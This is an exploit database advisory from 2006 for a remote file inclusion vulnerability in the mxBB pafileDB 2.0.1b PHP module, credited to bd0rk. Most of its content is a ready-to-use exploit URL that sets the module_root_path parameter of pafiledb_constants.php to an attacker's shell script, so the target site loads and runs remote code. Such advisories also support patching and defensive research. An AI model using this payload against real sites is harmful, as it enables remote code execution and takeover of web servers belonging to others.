mxBB Module pafiledb 2.0.1b - Remote File Inclusion

EDB-ID:

3018

CVE:

N/A

Author:

bd0rk

Type:

webapps

Platform:

PHP

Published:

2006-12-26

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

mxBB Module pafileDB 2.0.1b Remote File Include Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=15

by bd0rk || SOH-Crew

Vulnerable Code in pafiledb_constants.php

Exploit: http://[site]/[path]/modules/mx_pafiledb/pafiledb/includes/pafiledb_constants.php?module_root_path=[Shell]

# milw0rm.com [2006-12-26]